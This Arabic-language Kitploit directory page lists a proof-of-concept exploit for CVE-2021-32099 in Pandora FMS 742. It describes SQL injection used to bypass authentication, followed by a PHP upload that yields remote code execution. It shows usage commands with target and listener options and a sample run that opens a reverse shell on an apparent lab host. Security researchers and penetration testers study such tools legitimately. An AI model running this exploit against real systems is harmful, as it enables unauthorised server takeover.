Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-32099 — إثبات مفهوم لـ CVE-2021-32099 | Kitploit
أدوات/GitHubGitHub/magicrc/cve-2021-32099
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmagicrc/cve-2021-32099

CVE-2021-32099

إثبات مفهوم لـ CVE-2021-32099

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2021-32099 PoC

يوفر هذا المستودع استغلالًا كـ إثبات المفهوم (PoC) للثغرة CVE-2021-32099، والتي تؤثر على Pandora FMS 742. يُظهر الاستغلال كيف يمكن لمهاجم غير موثّق استغلال ثغرة حقن SQL لتصعيد صلاحيات جلسة غير مميزة إلى حساب بمستوى مسؤول. ومع الوصول الإداري، يمكن للمهاجم رفع ملف PHP تعسفي عبر مدير ملفات Pandora FMS، مما يؤدي إلى تنفيذ كود عن بُعد واختراق الخادم بصلاحية مستخدم خادم الويب.


⚠️ إخلاء المسؤولية

هذا المشروع مخصص لأغراض التعليم والبحث والاختبارات الأمنية المصرَّح بها فقط.
لا تستخدم هذا الكود على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
المؤلف غير مسؤول عن أي ضرر أو إساءة استخدام.


التثبيت

root@kitploit:~
python3 -m venv .venv && source .venv/bin/activate && pip install -r requirements.txt

الاستخدام

root@kitploit:~
┌───(magicrc㉿perun)-[~/code/CVE-2021-32099]
└─$ python3 ./CVE-2021-32099.py                                                           
usage: python3 ./CVE-2021-32099.py [--target TARGET] [--lhost LHOST] [--lport LPORT]

options:
  --target TARGET  Full URL of the vulnerable Pandora FMS instance.
  --lhost LHOST    IP address where the reverse shell will connect back to (must be reachable by the target). The listener will bind to 0.0.0.0 internally.
  --lport LPORT    Port number the reverse shell listener will bind to.

Example: python3 ./CVE-2021-32099.py --target http://target.com --lhost 10.10.14.157 --lport 4444

مثال

root@kitploit:~
┌───(magicrc㉿perun)-[~/code/CVE-2021-32099]
└─$ python3 ./CVE-2021-32099.py --target http://localhost --lhost 10.10.14.81 --lport 4444
[+] Bypassing authentication...OK
[+] Uploading reverse shell...OK
[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.129.177.29 on port 37308
[+] Executing reverse shell...
[*] Switching to interactive mode
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 06:59:07 up 17:30,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$  
تنزيل الأداة